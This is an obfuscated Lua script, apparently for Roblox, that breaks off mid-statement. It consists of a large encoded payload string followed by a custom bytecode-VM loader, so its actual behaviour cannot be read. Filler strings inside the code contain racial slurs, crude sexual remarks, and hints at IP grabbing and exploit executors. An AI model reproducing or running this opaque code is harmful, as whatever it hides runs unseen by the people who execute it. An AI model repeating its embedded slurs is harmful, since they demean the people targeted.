ټټئكؠټكقڪضحدڝڪټؠئززدآټڪحضحټڪڝؠسزټكزسڪئد؃ؠآض؃زڝكؠضزآئجضڪجسد؃ټجزټضڝدضڪؠؠحسڪجئحجسزحضڪآؠجؠآؠ؃سآئقټآآآكسئڪدزضكئض؃زآڪكضؠدسزضجدڪننكج؃ټآټكئضؠزقئڪدجڪؠنټززڝڝزجسححدڪقنڝآننحزآجڝڪضآحكنئآڪسزڝجآ؃جآنڪضؠټكزضنڝ؃ڪجنززدجؠآججزحجڪضنآزجق؃زجحكڝآؠؠنكڝ؃نؠزحجكئحجس؃؃ؠكقدضضڪټڪ؃نئسڪجقآ؃دقحئڪحنكز؃نڪضڝجدڝزآسقنئس؃ټټجقن؃جآئقؠضحسسئڝدضټككنزضسؠكدضددقټڝڪكټڝككضڝحؠڝټآجټؠڪقنضسآججئټج؃ڝټآدزكئحڝزآآن؃سآټڪقزئڪدضټآنجسنسسجقڝزقڪئټدئټؠڝحټقنجس؃جحڪڪؠؠقدحڪنآسقحڝڝس؃كڝجنڪزجئضڝ؃ټجقڝسڪحدڝضكڪدقټقكڝسسكجسسحنڪڝكؠضزدكټسسټحآڝجؠنآنؠسقحئنڝڪټحقڪضزڝدقجئز؃ڪټض؃نآقندڝدؠڝزڝئس؃ټدز؃ئټسكحسندآڪآسددجټجكنسدقڪسدحضڪنكسضحدئ؃كسقحزڪڪؠضؠڪؠحسڪئنټڝټقكقضآزقزڝئح؃كټ؃ڪجآجقؠس؃ؠجزڪئد؃قآڝ؃ټآڝقضضؠجڪزټئ؃؃زآڪ؃كآضك؃ئڝضكقزجڝ؃سآټڝقآڪقق؃كدكڪنضڪسټحټ؃ضآزقټئټححڪكدټ؃آآؠكحضكزجئنح؃ټنننئنجڝڝنزئجحڪسنټزئققسجحټڝضززق؃ضڪآآڪضنكسضجدڝجؠزئ؃دئټؠنحسنڪ؃ټحقڪضضدآحڝ؃ڝټحكآسئجقڪڝآجزآضئ؃ټڝآئ؃ڝڪآضقآكضقكئضحدؠضنضسڝحزڝ؃نسححڪ؃نزسڪققسضحڝڪڝؠڝقآح؃؃ڝټنڝنضكضآق؃قڝنئجزكدنؠئڝ؃؃آدققئڝقڪئټ؃زآآكڪسضج؃قنئڪدضټآڪقؠټقدئټآ؃نحضحدئټؠنحؠؠككضڪحسڝكئآححټنندسقز؃ضنحدآكآدززئزدئنڝقڝسجح؃ڪڝنڝقجئنكڝسسحټڝئؠؠقحقزض؃ئزنجسضحآڝج؃زڝ؃ؠسزئئڝؠكزكحؠڝحؠكڪئؠ؃قدجق؃ؠټضقڪدڝدڝڪسزضزئحضڪ؃ننضؠسضددڝسكنززڪڝنضسدحقڪڝڝزڪدؠدزئئ؃ڪؠآضكئضټحكڪدضڝددټدكقضڝسڪسدحقڪؠقكسڪئئززسڪحضڪآؠجؠآنحسؠجنڝټآڝكجس؃ح؃ټټقجزسجن؃ئآڪضسجڪؠضزقجڝ؃سدضڝكؠآقسنڝؠ؃ززجڪ؃ضآآزجآسسدكحڝټ؃ضڝكسج؃ڝقڪحڝضڝآكنڪزضجآ؃جآن؃دآقضڝدڪؠكزئجؠ؃حجڪټضآكقحئڝح؃ټضنحئآدضټئنحقټڪڝنؠزحجكسڪحآ؃ضؠقزڝئڝدكڪئنټزدحؠضجضئدؠڪحنكز؃جزجن؃ضقآضندنڪدنقټجكڝز؃حزڝنآئزټضحنزسڪجضڝآآجقنكنضقڪدنسسټجئڝؠآحقكققضزسنؠ؃سآججڝنجئڪټآجققئح؃ضآڝندسزحآ؃؃دحدقټآنجسنكڝضټجسؠڪضڝدئټؠنحآ؃كضسجحدڝئؠكزقڝنڝدټئك؃سڝححڝسككزجئس؃ضقججزڝضؠآقجندزحئئ؃نټككټضكح؃ڪسټضدقټزكڪسضزئسزحڪڝدكقزڪئكددكآجدڝحؠكق؃ققزؠئئددټدكڪزټؠؠزڝئس؃ټجض؃ؠآؠ؃كڝنؠززڪئضضججق؃ڪؠئقټسدحآڪسنزز؃ټئككس؃حزڪڪؠضؠآكئئنؠجكقضڝحسڪټؠئزؠضنئكؠ؃كڝضڪحضڪآڝسټؠنټزئجدڝزآ؃قڝضټققسؠسؠحسدضضټحزسحضنؠنزقجڝ؃سح؃ڝزآټقزئڪدڪؠڪؠجسڪضنكجضنحدڪقنڝڝسزڪئئحدكحضكح؃ڪزنڪضضنؠئجك؃آؠضكقج؃سج؃جئدضئدآكككضزدڪڪض؃ڝټؠكؠزجحكڝحآنقحضسڪجزكجك؃؃آزڪټؠئقضضد؃ڪټسؠ؃ټڝآڪقټضئدؠئئدحڪئسضس؃جټڝؠآضټڪڪقنقسڝجسئټج؃ڪآآؠزڪضحدنقنجڝڝآآجقنؠنقؠئؠ؃كټكنجسڪجزڝؠؠضڝكټڪنضسآججڝنآدڝضقڝڝقټټنئسؠجحڝكآ؃آؠقڪندڪضنجسنجدئقحؠڪزآسزكئټڪكټڪككئؠآټقضئآدجدآد؃ټنكجضؠحڝټزؠئقآجڪڝ؃ټ؃نسضنحقكڝئټددټقكڝنټكحسقكؠقآئكد؃ټزڝټآئكڝضقدټڝسؠنزئجؠ؃ڪ؃ڪسسټڝكآؠڝڪقئززڪټؠ؃ؠحڪڝدؠقزڝكضزټجك؃ك؃نحټڝ؃ؠززڪكضسټئض؃ڪزټجحڪڝؠسزټكزق؃ئئڝڝآدقنضجڝآڝدنآكسټقكقضڝحسجندضڪئؠ؃ض؃ئض؃؃ححجدڪآؠجزنكقسټجؠڝكآآكدض؃ڝڪټننحسآجنضكسدحجڪنؠدآ؃نڪزئجح؃ټآټټندكڝحضزټضئؠؠكټحڪسحضڪقنڝزسقجزججك؃سزضحدڪزنڪزضكئ؃ضجزڝآكسټڝټسئټضؠزنزحټزك؃ضزدڪئآ؃ټڪ؃كڝزئحټڝټآكقحدجدجڪسنټز؃ڪجكنضضدآڪجڪؠټضكآئئجڪ؃دآسزآحض؃نڪجكڝآئآضقآضجدنڪدنقؠئزسجضآؠقؠضحدكئقدؠڪحنضجسڝحؠكضدحدټڝنسسټقدضآحكڝزؠكقؠضج؃كټدسؠ؃سآدققئڝسنئڝ؃ټټحككضڪجحآآآئزنئندزئنجضڝقؠڝقسؠټزضئټدسئكجقڝزؠڪقضكجزقئڪڪڪټزنئسكححؠآئڝدحټكن؃ننقڝسقحئقضكئ؃دآڪټڪحڪسڝننڝنڝحضحد؃ټزكڪټآكؠسضحضڝئؠقز؃جك؃حټئجضڝحؠكق؃قټززئز؃دؠسقڝسجحڪڪئؠقسجټئكؠسححكڝ؃ؠزننقضزآټڪكنسدحقضحدڪڪحنززسجضڝنآآكجضجحززآئس؃نټدكقن؃زسجسئ؃قزئح؃كټ؃ڪڪؠڝقڪس؃ڝكڪكؠجئؠجزڝڝآكققآؠؠسزكئ؃؃زجضڝسآكققزسؠززقجڝ؃سدڝڝكآقكدضټدضجټڪ؃ټئڪجزجؠئجضټحڪڪ؃حئض؃ئآؠكحؠ؃قئضؠ؃؃ؠؠنڝئآدججكضآدڝڪسنټؠكنكززجسڪئسسدڪڪضنآټنكڝزضجنڝ؃آټقنئكدڝټجنټسدحكڝنؠنز؃ڪآننزدجقضجحؠ؃ضآقسزئج؃ؠټضنجآحآكقآضجدنجئددڪككؠجضآكقؠضحدكجضڪؠټزنححڪدكقنضددقټڝنسڪټزقجؠسنقټض؃دزټڪڝكټدنؠسڪدضك؃ئڝدسټټڪټټكنضسټحدڝضؠدزنسقؠټسنجدڝق؃حڝحؠسززئسآحټټكڝدزحجڝجنټزضئس؃سققئڝسكحسڝ؃ؠ؃ق؃ئټ؃دټ؃كؠكټآضقجئنددئڝ؃ڪټقكقسزحؠڪجنآزضئ؃كڝسضحآڝضدكقدئق؃ڝټسكټسئحؠ؃ئؠڝق؃ئز؃ڪس؃كآسجحنڝدؠقزڝئس؃ټټئكؠسححكڝ؃ؠززڪئس؃آټجكنسدحق؃دؠسزټئض؃ؠجټككس؃حز؃؃ؠضزآئئ؃نټسكقضڝحسدجؠئزؠئج؃كټككزضڝحضئڝؠجزڪنس؃قآڝكسسسحئڪآؠحزټنض؃زآڪكضسسحجڪؠؠدزقنآ؃سآټكئضآححڪكؠ؃زككټ؃ضآټكجسححدڪقنڝققزد؃ئآآكح؃جح؃ڪزنڪقزجآ؃جآؠكد؃آدڝڪسنټكئجؠ؃حآنك؃ضقدڪڝڪنآقضجن؃دآنقڝزټدټڪئنؠكحجك؃؃آكقڪضزدآ؃ټننقججقڝڝآكقټزؠدؠڪحنكقحجزڝڪآكقآټزدنڪدنقسڝجسڝټآسقؠضسدكڪحنزقڪجضڝآآسقنضجدق؃؃نسقټجئڝؠآسقكضجدززآنضسآزڝڝنآضققضددسټڝنئزدنټڝكآضقزضحدضټټنجسڪجدڝقحدقسئټدئټټنحسكج؃ڝزح؃قضئآدجټټندسقحڝڝسدڝقئئؠدحټنن؃سزحڪڝضدڪقجئنددټآكڝسسحټ؃سټ؃قحئڪد؃ڪآكڪسضحآ؃ضؠنقدئټ؃ڝقحكټسئحؠ؃ئؠكق؃ئټ؃ڪڝآكآسجحنڝدؠقزڝئؠ؃ټټسكؠسئحكد؃ؠززڪئؠ؃آټقكنسزحق؃ڝؠسزټئؠ؃ؠټزككڪححز؃؃ؠضزآئؠ؃نئحكقضڝحسڪټؠئزؠئؠ؃كټضكزضڪحضڪآؠجزنئؠ؃قآڝكسضټحئڪؠؠحزكئق؃زټقكضضټحجڝآححزقئز؃سجككئضؠححڪڝحؠززئز؃ضټحكجضؠحدڪننڝزسكڝ؃ئآؠكحضنح؃ڪزنڪزضكڪ؃جآنكدضڪدڝڪسنټزئقز؃حټدك؃ضكدڪڪزنآقجضڝ؃دآټقڝضآدټڪآنؠقئنن؃؃آڝقڪآددآڪجننززؠجڝڝآڝقټضؠدؠڪجنكزدجزڝڪحزقآضجدنڪقنقسڝجسڝټحڪقؠضندكڪحنزز؃جض؃آآجقنضسدقسدنسزضجئ؃ټآحقكضقدزئڝنضسآججڝنآدققضقدسڪحنئسؠجحڝكآ؃قزضقدضټټنجسنجدڝقؠڝقسضضدئڪضنحسنج؃؃كؠڪقضضئدجحزندسقحڝدسؠټقئضجدحڪدن؃ټكحڪ؃زؠآقجضجددضضكڝسسحټڝئؠؠقحضدد؃ټككڪسزحآ؃ضؠنقدضد؃ڝحجكټسئحؠدحؠكق؃ض؃؃ڪټڪكآټضحن؃جؠقزڝض؃؃ټدزكؠسححكڝ؃ؠززڪئڪ؃آټضكنسجحق؃دؠسزټئڪ؃ؠدڝككس؃حز؃ڪؠضزآئټ؃نټؠكقټدحسڝڝؠئزؠئټ؃كزټكزضڪحضڪآؠجزنئؠ؃قټدكسضڝحئڝټؠحزكئؠ؃زدؠكضضآحج؃نؠدزقئن؃سټقكئآټححڝؠؠ؃ززئن؃ضزككجضنحدڪقنڝزسئق؃ئآټكحضؠح؃ڝكنڪزضئق؃جدزكدضقدڝ؃سنټزئئز؃حټضك؃آكدڪڝزنآزجئز؃دټدقڝضسدټڪئنؠزحئض؃؃آكقڪضزدآڝضننزدئضڝڝدجقټضئدؠ؃حنكز؃ئئڝڪټحقآآضدنڝجنقسڝئئڝټآټقؠضحدكڪ؃نزسڪئحڝآآضقنضجدقڝدنسسټئحڝؠ؃ڝقكض؃دزڝڪنضسآئدڝنآڝققآددسڪڝنئسؠئدڝكآكقزئڪدضټآنجسنجڝڝقآدقسئڝدئ؃ؠنحسكجقڝزټئقضضټدجڪآندسقجڪڝسڪئقئئؠدحڝكن؃سزجټڝضآؠقجآڪددڝقكڝسسجآڝئآنقحسند؃ڝزكڪسضجؠڝجآكقدڪڪ؃ڝڪقكټسئجآڝحؠؠق؃ئز؃ڪټضكآسججكڝدآكزڝئق؃ټڪئكؠسحجدڝ؃ټكزڪضئ؃آڪضكنسدجزڪڝسدزټئئ؃ؠڝحككس؃جسڪڪآئزآسج؃نڝدكقضڝجضڪټآجزؠئآ؃كڪ؃كزضڪحټڪآټجزنض؃؃قڝڝكسضټحټڪؠآقزكټ؃؃زټڪكضضآحآڪنټجزقئز؃سټڝكئضؠجدڪكټڪززجڪ؃ضڪآكجضنج؃ڪقؠڪزسقټ؃ئټټكحضكج؃ڪزحآزضجآ؃جټآكدضقج؃ڪسحؠزئجؠ؃حټؠك؃ضزج؃ڪضحنزججن؃دآققڝضسحآڪئؠټزحجؠ؃؃ټزقڪضضحضڪجد؃زدئزڝڝټققټضئحنڪحټزز؃جزڝڪڪضقآضجحكڪدؠزسڝقسڝټټسقؠضححكڪ؃ئ؃سڪجضڝآټضقنضدحكټڝجڝسټجئڝؠټئقكض؃حكټڪجڪسآججڝنآدققئڝحضټټؠسسؠجئڝكټ؃قزئڪدڪټآڪزسنئ؃ڝقټدقسئټحجټؠڪدسكج؃ڝزټڪقضئآححټنؠ؃سقندڝسآڝقئئؠححټكجسسزحڪڝضآڪقجئنححټقنڝسسحټڝئآټقحئكححټز؃زسضحآڝجآآقدئقححټسنټسئحؠڝحؠكق؃ئزدټټضنڝسجحآڝدآقزڝئسدسټئڪضسحجقڝ؃آكزڪئضدؠټجټكسدحقڪڝټسزټئئدنټحنقس؃ككڪڪآززآئجدنټدنقضڝحسڪټآسزؠئحدنټ؃؃دضڪحضڪآآضزنئددنآڝنسضټحئڪؠآئزكئ؃دنآڪكسضآحجڪنؠدزقجڝدضآټنزضؠحئڪكآ؃ززجڪ؃ڪآآئدضنج؃ڪقټڝزسجټ؃ڪآؠنقضكؠدڪزؠڪزضجآ؃ټآنؠجضقحقڪسؠڝڪضجؠددآكؠڪضزدڪڪضآآڝزجند؃آقكڪضسسټڪئؠټزحجكد؃آزڝؠضضدآڪجؠآزدجقد؃آس؃سضئدؠڪحؠؠز؃جزد؃آض؃ؠضجدنڪدنقسڝجس؃آآئكټضحدؠڪ؃ؠزسڪجض؃سآجڝ؃ضدحزټڝؠقسټجئ؃نآحآقض؃دزټڪآضسآجج؃كآدكزئڝققټټؠسسؠجح؃كآ؃دجئڪدضټآؠضسنجد؃كؠڝكسئټدئټؠؠئسكج؃؃كؠڪ؃دئآدجټنؠجسقحڝ؃كؠټكئئؠدحټكن؃سزحڪ؃ئؠآكسئندجټقنڝسسحټڝڪؠؠآآئكدڝټزؠ؃سضحآ؃حؠنآ؃ئق؃ڝټسؠټسئحؠ؃دؠكقڝئزق؃ټضنڪسجحن؃دؠققڝئس؃ټټئنټسححك؃دؠز؃ئئض؃آټجنآسدحق؃دؠسقټئئ؃ؠټحنؠس؃حز؃دؠضحآئج؃نټدكقضڝحسڝآؠئقڪئح؃ؠټ؃نزضڪحضڝسؠجحقئددزآڝنقضټحئڝنؠححئئ؃؃زآڪؠضضآحجڝكؠدقزجڝكنآټؠئضؠححڝقؠ؃قسجڪ؃كآآنجضنحدڝحنڝ؃نجټدجآؠآحضكح؃ڝدنڪحسجآزسآننجضقدڝڝضنټنحجؠ؃حآكؠ؃ضزدڪڝئنآقحجنضدآقندضسدټڝئنؠقحجك؃؃آزن؃ضضدآڝئننقدجقڝڝآسكڝضئدؠڝئنكق؃جزڝڪآضقآضجدنڝ؃نققدجسڝڝآئكؠضحدكڪننزؠ؃جض؃ؠآجؠنضددقڪكنسنڪجئكڪآحؠكض؃دزڪكنضقحججئدآدكقئڝدسڪقنئقټجح؃حآ؃ككئڪدضڪؠنجكقجدڝقؠڝنسئټدئڪننحزقج؃ئزؠڪكزئآدجڪنندڪححڝڝسؠټكسئؠدحڪنن؃ززحڪڝضؠآكضئنددڪنكڝسكحټڝئؠؠقحئكد؃ڪسكڪززحآڝضؠنكدئق؃ڝڪدكټآنحؠ؃دؠككحئز؃ڪڪئكآنححنڝدؠقكڝئس؃ټڪجكؠزدحكسحؠزك؃ئض؃آڪجكنز؃حقڪڝؠسقڝئئ؃ؠڪجككز؃حزڪڪؠضقڪئج؃نڪجكقڝڝحسڪټؠئقټئح؃كڪجكزسڪحضڪآؠجزنئد؃قټڪكسز؃حئڪټؠحقكئ؃؃زټككضنسحجڝكؠدقنجڝ؃سټآكئكنححڪكؠ؃كزجڪ؃ضټؠكجسكحدضننڝققجټ؃ئټؠكحسكح؃ڪزنڪقزجآ؃جټؠكدزؠدڝڪسنټقسجؠ؃حټؠك؃سزدڪڪضنآقضجن؃دټؠقڝآسدټڪئنؠزحجك؃؃ټسقڪسقدآڪضننقدجقڝڝټدقټ؃حدؠڝدنكقحجزڝڪټئقآڝڪدنڪدنققڝجسڝټټجقؠسددكزئنزقڪجضڝآټحقنس؃دقحزنسزټجئڝؠآټقكڪئدزڪټنضكآججڝنآآقق؃؃دسجئنئزټجحڝكآڝقززآدضټآنجقنجدڝقآڪقسضآدئحؠنحزؠج؃ڝزآڪقضضآدجټنندزنحڝڝسآڪقئضؠدحټكن؃زكحڪڝضآڪقجضنددټقكڝسسحټڝئآنقحضؠد؃ټككڪزضحآڝجآضقدقن؃ڝڪضكټكئحؠڝحآئق؃قق؃ڪڝئكآكجحنڝدآئزڝضآ؃ټ؃دكؠزححكڝ؃آجزڪسز؃آټآكنزجحقڪڝآضزټزح؃ؠټحككق؃حزڪڪآئزآضح؃نحدكقزدحسڪټآئزؠآد؃كټ؃كزز؃حضڪآآئزنؠؠ؃قآڝكسسڝحئڪؠآئزكؠن؃زآڪكضضآقكڪنآ؃زقضد؃سآڝكئسؠجټڪكؠآززنئ؃ضټؠكجسآحدڪقؠڪزسسؠ؃ئآؠكحزكح؃ڪزؠټزضئؠ؃جدنكدسندڝڪسؠټزئئؠ؃حآكك؃سكدڪڪضؠټزجئن؃دآققڝسقدټڪئؠټزحئك؃؃آزقڪضضدآڪجؠكزدئنڝڝآققټسئدؠڪحؠضز؃زؠڝڪټئقآقجدنڪدؠئسڝؠڝڝټټزقؠسئدكڪ؃ؠسسڪزئڝآآجقنزددقټڝؠضسټئجڝؠجئقكسحدزټڪؠضسآقڪڝنآدققسددسټټؠضسؠئحڝكآ؃قزس؃دضټآؠضسنئدڝقؠڝقسضڝدئټؠؠضسكئ؃ڝزؠڪقضئآدجټنؠ؃سقئحڝسؠڝقئضؠدحټكنآسززقڝضآؠقجضآددټقنڪسسسآڝئؠؠقحسكد؃ټزنټسضجؠڝجحآقدضن؃ڝټسنټسئجؠڝحؠكق؃ضك؃ڪټضنټسجقؠڝدؠقزڝضق؃ټټئنټسحجكڝ؃ؠززڪضز؃آټجنټسدكضڪڝؠسزټئئ؃ؠټحنقس؃جنڪڪؠززآضج؃نټدنئضڝټئڪټآجزؠضئ؃كټ؃نسضڪټ؃ڪآؠجزنسد؃قآڝنضضټججڪؠئسزكس؃؃زآڪنئضآجحڪنڝكزقئڝ؃سآټن؃ضؠؠسڪكؠڝززسڪ؃ضآآكڝضنټحڪقئئزسئڝ؃ئآؠندضكئڪڪزنڪزضضآ؃جآنن؃ضقحڪڪسڝټزئئټ؃حآكن؃ضزحڪڪضنآزجئآ؃دآقن؃ضسحټڪئنؠزحئؠ؃؃آزن؃ضضحآڪجننزدجقڝڝآسكآضئحټڪحنؠز؃ئزڝڪآضكقضجضآڪدؠزسڝسسڝټآئكزضححضڪ؃؃ضسڪسضڝآآجكسضدضكټڝئكسټسئڝؠآحكضض؃ضئټڪ؃جسآسجڝنآدكضئڝحآټټڝڪسؠئحڝكآ؃كئئڪجزټآنآسنئجڝقؠڝكضئټئحټؠنحسكض؃ڝزؠڪكئئآححټنڝدسقئدڝسؠټكئئؠككټكن؃سزئ؃ڝضؠآكئئنضنټقكڝسسجڝڝئؠؠكئئكقڝټزكڪسضحآڝجؠنك؃ئقحدټسكڝسئجؠڝحؠكقټئززئټضنؠسججآڝدؠققڪئسئآټئكؠسحئكڝ؃ؠزقټئضدؠټج؃آسدجنڪڝؠسقټئئدسټحككس؃جكڪڪؠضقټئجدنټدكقضڝجقڪټؠئقټئحقكټ؃كزضڪجزڪآؠجقټئددقآڝكسضټحئڪؠؠحققئ؃دنآڪكزضآججڪنؠدقضجڝض؃آټنجضؠجئڪكؠ؃قسجڪئئآآكجضنئدڪقنڝقضجټدجآؠ؃ئضكجحڪزنڪقضجآدجآنكدضقجدڪسنټقضجؠسنآكك؃ضزج؃ڪضنآقضجنددآققڝضسحڝڪئنؠقضجكحئآزقڪضضدآڪجننق؃جقدحآسقڝضئحؠڪحنكزټجزنآآضكؠضجحآڪدنقزڪجسنقآئقؠضحجكڪ؃نززټجض؃ؠآجدڪضدجقټڝنسزآجئ؃نآحټدض؃حزټڪنضزكججقڪآدكزئڝئسټټنئزقجحننآ؃جنئڪحزټآنجزكجدحسؠڝقسئټجئټؠنحزقج؃؃سؠڪټضئآحضټنندزقحڝ؃سؠټقئئؠحئټكن؃زقحڪ؃ضؠآقجئنحجټقكڝزقحټ؃ئؠؠقحئكد؃ټزكڪزئحآ؃ضؠنقجئقدڝټسكټزدحؠجئؠكقڝئزجڪټضكآز؃حنجحؠقححئسجټټئكؠز؃حك؃سؠز؃ؠئضدآټجكنسڝحقددؠسقضئئدټڪسككسڝحزدآؠضزآئجحنټدكقسڪحسڝآؠئآؠئحدؠټ؃كزسڪحضسؠؠجزنئددنآڝكسسڪحئسنؠحزكئ؃دكآڪكضسڪحجسكؠدزقجڝ؃سآټكئسنححڝؠؠ؃زكجڪدضآآكجسقحدئڪنڝقضجټجئآؠكحسزح؃ز؃نڪققجآدضآنكدسزدڝحضنټزئجؠححآكك؃سسدڪڝئنآڪضجندججټقڝسسدټززنؠزحجكدحدضقڪسسدآڝجننزدجقددآسقټسسدؠقؠنكز؃جزد؃آضقآسسدنڝدنقسڝجسڝټآئقؠسددكڝجنزز؃جض؃آآجقنضڝدقحكنسزآجئ؃ټآحقكضڝدزدټنضسآججدنآدققضڪدسڪآنئټټجح؃ؠآ؃قزضڪدضڪآنجسنجد؃نؠڝقسضڪدئدئنحسكج؃؃كؠڪقضضڪدجڪنندسقحڝ؃قجحقئضڪدحئقن؃سزحڪڝضؠټقجضكددڪؠكڝسقحټ؃ئؠؠقحضزد؃قضكڪزئحآ؃ضؠنقدضز؃ڝقدكټسئحؠدحؠكق؃ضس؃ڪڪئكآڝزحنددؠقزڝضض؃ټڪجكؠننحك؃؃ؠززڪضج؃آسزكنز؃حقدڝؠسزټضح؃ؠقجككڪټحز؃؃ؠضزآضح؃نڝڝكقضڝحس؃ټؠئزؠضد؃كټڝكزنڪحضڝڪؠجزنضد؃قټڝكسضټحئڝټحززكضد؃زټڪكضضآحجڝآحسزقضد؃سټټكئضؠححڪكدسززئټ؃ضټڪكجضآحدڝقټئزسئؠ؃ئ؃ټكحسقح؃دزؠحزضئن؃ج؃ؠكدڝؠدڝڪآحقزئئن؃حآآك؃ضقدڪڪسنآزجكآ؃دآققڝضڝدټڪئنؠقئكس؃؃ټزقڪقآدآڪجننكدجقڝڝټسقټسئدؠجضنكز؃جزڝڪټسقآسحدنڪدنقسڝجسڝټټئقؠضئدكڪحنزسڪجضڝآټجقنضحدقڪ؃نسزجنڝڝؠټحقكضضدزټڝنضسټججڝنحجققئڝدسڪزنئسؠجح؃ؠدټقزضڝدضدجنجسنجددقؠڝقسضڪدئڪآنحؠآج؃ڝزؠڪقضضڪدجڪنندسقحڝڝسؠټقئضآدحټؠن؃سكحڪڝضؠآقجضؠددټككڝسزحټڝنجسقحضند؃ټقكڪسسحآڝئؠنقدنن؃ڝټسكټز؃حؠڝحؠككحنئ؃ڪڪزكآكنحنڝدؠقكڝئس؃ټڪسكؠزئحكئجؠززڪئض؃آڪسكنزححقڪڝؠسزټئئ؃ؠڪئككسححزڝ؃ؠضزآئج؃نڪجكقس؃حسڪڪؠئقدؠټ؃كڪحكزس؃حضڪټؠجزؠئد؃قجدكسضټحئڝقؠحزكئ؃دكحؠكضسڝحجحدؠدزقجڝحسآټكئسڪححڝآؠ؃آنجڪ؃ضآآكجسڪحدڝننڝزسجټ؃ئآؠكحسآح؃ڪكنڪززجآ؃جآنكدسؠدڝڪزنټزضجؠ؃قئئك؃سندڪڪڪنآزئجن؃حآققڝؠقدټڪئنؠق؃جك؃؃آزن؃ؠقدآڝزنننقجقڝڝآسنټضئدؠڝسنكقئجزضدآضقآضجدنڝسنققحجسڝټآئقؠضحدكڝئنزز؃جضڝڪآجقنضددقڝجنسسڪجئڝآآحقكض؃دزټڪنضسټججڝنآد");local P=(168-0x6f)local n=83 local o=d;local e={}e={[(-#[[If LocalPlayer equals Dumbass then while true do end]]+(159-0x6a))]=function()local d,e,l,i=A(j,o,o+m);o=o+y;n=(n+(P*y))%a;return(((i+n-(P)+r*(y*_))%r)*((_*I)^_))+(((l+n-(P*_)+r*(_^m))%a)*(r*a))+(((e+n-(P*m)+I)%a)*r)+((d+n-(P*y)+I)%a);end,[((0x79b/33)-0x39)]=function(e,e,e)local e=A(j,o,o);o=o+U;n=(n+(P))%a;return((e+n-(P)+I)%r);end,[(-#[[33 cocks in my mouth]]+(2967/0x81))]=function()local l,e=A(j,o,o+_);n=(n+(P*_))%a;o=o+_;return(((e+n-(P)+r*(_*y))%r)*a)+((l+n-(P*_)+a*(_^m))%r);end,[(580/0x91)]=function(n,e,o)if o then local e=(n/_^(e-d))%_^((o-U)-(e-d)+U);return e-e%d;else local e=_^(e-U);return(n%(e+e)>=e)and d or p;end;end,[((0x95-133)+-#'panzerfaust')]=function()local o=e[(-#'I like watching videos of black men shaking their booty cheeks'+(7056/0x70))]();local l=e[(0x66+-101)]();local i=d;local n=(e[(0x2b4/173)](l,U,v+y)*(_^(v*_)))+o;local o=e[((-0xe4/3)+80)](l,21,31);local e=((-d)^e[(-121+0x7d)](l,32));if(o==p)then if(n==z)then return e*p;else o=U;i=z;end;elseif(o==(r*(_^m))-U)then return(n==p)and(e*(U/z))or(e*(p/z));end;return J(e,o-((a*(y))-d))*(i+(n/(_^R)));end,[(48-0x2a)]=function(l,i,i)local i;if(not l)then l=e[((0x8a-126)+-#[[monkey mode]])]();if(l==p)then return'';end;end;i=Y(j,o,o+l-d);o=o+l;local e=''for o=U,#i do e=V(e,L((A(Y(i,o,o))+n)%a))n=(n+P)%r end return e;end}local function p(...)return{...},K('#',...)end local function Y()local h={};local l={};local o={};local i={h,l,nil,o};local n={}local t=(-#{'}',1,'}';59,47;","}+92)local o={[(0x4d/77)]=(function(o)return not(#o==e[(0x24-34)]())end),[((0x230/(144-0x74))+-#[[Impulse youtube ez]])]=(function(o)return e[(0x2d/9)]()end),[(-#"sussy chat sussy sussy"+(0x83-109))]=(function(o)return e[((220-0x98)+-#[[you can pull my IP but you cant pull any bitches fucking loner]])]()end),[(0x60-92)]=(function(o)local n=e[((-0x72c6/249)+0x7c)]()local e=''local o=1 for l=1,#n do o=(o+t)%a e=V(e,L((A(n:sub(l,l))+o)%r))end return e end)};for e=U,e[(0x61-96)]()do l[e-U]=Y();end;i[3]=e[((520-0x126)/113)]();local l=e[(0x98/((429-0x107)+-#'nigga porn 360'))]()for l=1,l do local e=e[(69-0x43)]();local d;local e=o[e%(0x39c/33)];n[l]=e and e({});end;for r=1,e[(127-(349-0xdf))]()do local o=e[(-108+0x6e)]();if(e[(-#'testing this thingy lololollez'+(0x8b+-105))](o,d,U)==z)then local i=e[((2754/0x51)+-#[[If no milk then return ffather]])](o,_,m);local l=e[((167-(0x7404/220))+-#"If no father return milk end")](o,y,_+y);local o={e[(((15678/0x4e)+-#"if syn then haxor alert end")/0x3a)](),e[(150/0x32)](),nil,nil};local a={[((-85+0x55)/244)]=function()o[b]=e[((0xe90/233)+-#'Big black men')]();o[C]=e[(-#[[windows xp startup sfx]]+(0xa0f/103))]();end,[(-#[[nate higger nuck figgers and nill kiggers]]+(0x23ee/219))]=function()o[b]=e[((88-0x3a)+-#[[Obfuscated By Obamas Left Nut]])]();end,[(-94+0x60)]=function()o[x]=e[(-#'IP grabbed'+(0x2e1/67))]()-(_^v)end,[((0x1c60/227)+-#"use luraph if want lost money")]=function()o[k]=e[(22-0x15)]()-(_^v)o[g]=e[(-#[[Bwomp]]+(-0x4c+84))]();end};a[i]();if(e[(-#'monkey mode'+(0x3ed/67))](l,U,d)==U)then o[w]=n[o[c]]end if(e[(105-0x65)](l,_,_)==d)then o[x]=n[o[O]]end if(e[(-98+0x66)](l,m,m)==U)then o[g]=n[o[S]]end h[r]=o;end end;return i;end;local function z(e,y,P)local n=e[_];local o=e[m];local e=e[d];return(function(...)local v=n;local L={...};local n={};local a=o;local r=e;local I={};local e=d e*=-1 local m=e;local A={};local j=K('#',...)-U;local o=d;local p=p for e=0,j do if(e>=a)then A[e-a]=L[e+U];else n[e]=L[e+d];end;end;local j=j-a+d local e;local a;while true do e=r[o];a=e[(0x55/85)];l=(239436)while a<=(0x3b80/224)do l-= l l=(3560760)while(-0x74+149)>=a do l-= l l=(441896)while(-0x3c+76)>=a do l-= l l=(3886110)while((86-0x43)+-#'mike litoris')>=a do l-= l l=(9612990)while a<=((92-0x47)+-#'free bobux no skem')do l-= l l=(522291)while a<=((620/0x5)-0x7b)do l-= l l=(2832840)while(0x59-89)<a do l-= l local l;l=e[h]n[l]=n[l](M(n,l+d,e[u]))o=o+d;e=r[o];n[e[i]][e[b]]=n[e[S]];o=o+d;e=r[o];n[e[h]]=P[e[b]];o=o+d;e=r[o];n[e[t]]=n[e[O]][e[N]];o=o+d;e=r[o];n[e[c]]=n[e[O]][e[B]];o=o+d;e=r[o];n[e[t]][e[x]]=n[e[C]];o=o+d;e=r[o];n[e[i]][e[x]]=e[g];o=o+d;e=r[o];n[e[c]]=P[e[b]];o=o+d;e=r[o];n[e[i]]=n[e[b]][e[B]];o=o+d;e=r[o];n[e[c]]=e[b];break end while(l)/(((385790/0xdf)+-#"bigchungus"))==1647 do n[e[c]]=y[e[b]];break end;break;end while 627==(l)/((0x6de-925))do l=(4344278)while a>((96-0x43)+-#'if syn then haxor alert end')do l-= l local 